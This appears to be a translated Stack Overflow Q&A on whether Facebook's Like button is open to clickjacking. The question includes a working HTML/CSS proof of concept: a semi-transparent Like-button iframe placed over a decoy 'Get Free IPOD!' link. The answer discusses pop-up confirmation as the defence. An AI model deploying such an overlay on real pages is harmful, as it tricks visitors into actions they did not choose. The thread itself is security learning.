javascript - facebook 是否喜欢按钮容易受到点击劫持？

Question

几天前，我从 http://javascript.info/tutorial/clickjacking 了解到有关点击劫持攻击的信息.所以今天我尝试使用 facebook 之类的按钮。而且看来我实验成功了。

但我不确定天气我是否正确？这是我使用的代码片段。

<html>
<head>
    <script>
      window.fbAsyncInit = function() {
        FB.init({
          appId      : '********',
          xfbml      : true,
          version    : 'v2.1'
        });
      };

      (function(d, s, id){
         var js, fjs = d.getElementsByTagName(s)[0];
         if (d.getElementById(id)) {return;}
         js = d.createElement(s); js.id = id;
         js.src = "//connect.facebook.net/en_US/sdk.js";
         fjs.parentNode.insertBefore(js, fjs);
       }(document, 'script', 'facebook-jssdk'));
    </script>
    <style>
        iframe { /* iframe from facebook.com */
          width:140px;
          height:100px;
          margin-top: 100px;
          margin-left: 50px;
          position:absolute;
          top:0; left:0;
          filter:alpha(opacity=50); /* in real life opacity=0 */
          opacity:0.5;
        }
        .a{
            margin-top: 95px;
        }
    </style>
</head>
<body>
    <div class="a">
        <a  href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">Get Free IPOD!</a>
    </div>
    <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2FTimesnow&amp;width&amp;layout=button&amp;action=like&amp;show_faces=false&amp;share=false&amp;height=35&amp;appId=*****" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:35px;" allowTransparency="true"></iframe>
</body>
</html>

我可以将 iframe 的不透明度设置为 0，这样当用户点击链接时，用户看不到 fb 赞按钮，攻击者页面将被自动点赞。

示例 fiddle :http://jsfiddle.net/5e5kvxk4/2/

我错过了什么吗？或者 facebook 的 like 按钮真的很脆弱？

Answer 1

是的，它可能容易受到点击劫持。那里isn't a good solution to protect widgets from forged requests使用当前的网络技术。

小部件将容易受到点击劫持或 CSRF 的影响，如下所述:

来自“How to protect widgets from forged requests”:

You don't want this [widget] to be vulnerable to CSRF so you write an iframe to the page. Based on the origin inheritance rules the parent site won't be able to read the CSRF token. However what about clickjacking (or likejacking )? Because of CSRF you must be within an iframe and there for the x-frame-options cannot help, and the same holds true for frame-busters

目前最好的解决方案似乎是使用弹出窗口来验证点击:

Clicking on the widget needs to open a pop-up window containing a new page -- an iframe is not good enough, it must be a new window -- which is entirely under the control of your web application. Confirm the action, whatever it is, on that page.

Yes, this is somewhat inelegant, but the present Web security architecture doesn't give you any better options.